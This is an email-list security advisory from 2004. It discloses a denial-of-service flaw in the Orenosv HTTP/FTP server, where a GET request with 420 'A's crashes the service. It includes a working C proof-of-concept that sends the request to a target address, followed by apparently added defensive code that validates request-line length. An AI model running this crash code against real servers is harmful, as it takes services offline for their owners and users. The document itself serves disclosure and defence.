Orenosv HTTP/FTP Server Denial Of Service


Date: Tue, 25 May 2004 23:48:52 -0400 (EDT)
From: badpack3t <[email protected]>
To: [email protected]
Subject: Orenosv HTTP/FTP Server Denial Of Service

------=_20040525234852_95297
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit

Please publish:

http://security-protocols.com/modules.php?name=News&file=article&sid=1987

Or the attached advisory.

Thanks,

----------------------------------------
badpack3t
www.security-protocols.com
----------------------------------------

------=_20040525234852_95297
Content-Type: text/plain; name="sp-x13-advisory.txt"
Content-Transfer-Encoding: 8bit
Content-Disposition: attachment; filename="sp-x13-advisory.txt"

SP Research Labs Advisory x13
-----------------------------

Orenosv HTTP/FTP Server Denial Of Service
-----------------------------------------

Versions:
orenosv059f

Vendor:
http://hp.vector.co.jp/authors/VA027031/orenosv/index_en.html

Date Released - 5.25.2004

------------------------------------
Product Description from the vendor:

Orenosv is an HTTP/FTP/FTPS server running on Windows NT 4.0, Windows 2000 and Windows XP platforms.
Orenosv is a freely distributable software.

--------
Details:

A specially crafted HTTP GET request which contains 420 A's will cause the HTTP and FTP service
to stop responding.

--------
Exploit:

Attached to this advisory is very basic PoC code which only causes the orenosv service to crash.

--------------
Tested on: 
WindowsXP SP1

peace out,

--------------------------
badpack3t
www.security-protocols.com
--------------------------

/****************************/
   PoC to crash the server
/****************************/

/* Orenosv HTTP/FTP Server Denial Of Service
   
   Version:
   orenosv059f
  
   Vendor:
   http://hp.vector.co.jp/authors/VA027031/orenosv/index_en.html

   Coded and Discovered by:
   badpack3t <[email protected]>
   .:sp research labs:.
   www.security-protocols.com
   5.25.2004
 */

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>   /* exit, atoi */
#include <string.h>   /* memcpy */

#pragma comment(lib, "ws2_32.lib")

char exploit[] = 

/* 420 A's - looks ugly but owell */
"GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.0\r\n\r\n"; 

int main(int argc, char *argv[])
{
	WSADATA wsaData;
	WORD wVersionRequested;
	struct hostent  *pTarget;
	struct sockaddr_in 	sock;
	char *target;
	int port,bufsize;
	SOCKET mysocket;
	
	if (argc < 2)
	{
		printf("Orenosv HTTP/FTP Server DoS by badpack3t\r\n\r\n");
		printf("Usage:\r\n %s <targetip> [targetport] (default is 9999)\r\n\r\n", argv[0]);
		printf("www.security-protocols.com\r\n\r\n");
		exit(1);
	}

	wVersionRequested = MAKEWORD(1, 1);
	/* WSAStartup returns 0 on success and a positive error code on failure */
	if (WSAStartup(wVersionRequested, &wsaData) != 0) return -1;

	target = argv[1];
	port = 9999;

	if (argc >= 3) port = atoi(argv[2]);
	bufsize = 1024;
	if (argc >= 4) bufsize = atoi(argv[3]);

	mysocket = socket(AF_INET, SOCK_STREAM, 0);
	if(mysocket==INVALID_SOCKET)
	{	
		printf("Socket error!\r\n");
		exit(1);
	}

	printf("Resolving Hostnames...\n");
	if ((pTarget = gethostbyname(target)) == NULL)
	{
		printf("Resolve of %s failed\n", argv[1]);
		exit(1);
	}

	memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
	sock.sin_family = AF_INET;
	sock.sin_port = htons((USHORT)port);

	printf("Connecting...\n");
	if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
	{
		printf("Couldn't connect to host.\n");
		exit(1);
	}

	printf("Connected!...\n");
	printf("Sending Payload...\n");
	if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
	{
		printf("Error Sending the Exploit Payload\r\n");
		closesocket(mysocket);
		exit(1);
	}

	printf("Payload has been sent! Check if the webserver is dead.\r\n");
	closesocket(mysocket);
	WSACleanup();
	return 0;
}
------=_20040525234852_95297--
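
Seen from the receiving side, this is a request-line check a server or front-end filter could apply before any handler touches the URI. It is an added example, not part of the advisory and not Orenosv's code; `check_request_line`, `MAX_TARGET_LEN` and `MAX_RUN_LEN` are assumed names and limits, since the advisory states neither the root cause nor a safe length.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed limits for this sketch; the advisory gives no safe length. */
#define MAX_TARGET_LEN 256
#define MAX_RUN_LEN    64   /* longest tolerated run of one repeated byte */

enum verdict { REQ_OK = 200, REQ_BAD = 400, REQ_URI_TOO_LONG = 414 };

struct req_info {
    size_t target_len;   /* bytes in the request target */
    size_t longest_run;  /* longest run of one repeated byte in the target */
    int suspicious;      /* 1 if longest_run > MAX_RUN_LEN: worth logging */
};

/* Inspect "METHOD SP target SP HTTP/x.y" using explicit lengths only:
 * nothing is copied into a fixed buffer, so input size cannot overrun one. */
enum verdict check_request_line(const char *line, size_t len,
                                struct req_info *out)
{
    const char *sp1, *sp2, *end = line + len;
    size_t i, run = 1;

    memset(out, 0, sizeof *out);
    sp1 = memchr(line, ' ', len);
    if (sp1 == NULL || sp1 == line) return REQ_BAD;        /* no method */
    sp2 = memchr(sp1 + 1, ' ', (size_t)(end - (sp1 + 1)));
    if (sp2 == NULL || sp2 == sp1 + 1) return REQ_BAD;     /* no target */
    if ((size_t)(end - sp2) < 6 || memcmp(sp2 + 1, "HTTP/", 5) != 0)
        return REQ_BAD;                                    /* no version */

    out->target_len = (size_t)(sp2 - sp1 - 1);
    out->longest_run = 1;
    for (i = 1; i < out->target_len; i++) {
        run = (sp1[1 + i] == sp1[i]) ? run + 1 : 1;
        if (run > out->longest_run) out->longest_run = run;
    }
    out->suspicious = out->longest_run > MAX_RUN_LEN;
    return out->target_len > MAX_TARGET_LEN ? REQ_URI_TOO_LONG : REQ_OK;
}

int main(void)
{
    const char ok[] = "GET /index.html HTTP/1.0";  /* constructed sample */
    struct req_info ri;
    printf("%d\n", (int)check_request_line(ok, sizeof ok - 1, &ri));
    return 0;
}
```

The `suspicious` flag is independent of the length verdict, so a filter can log filler-style targets even when they fit under the limit.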
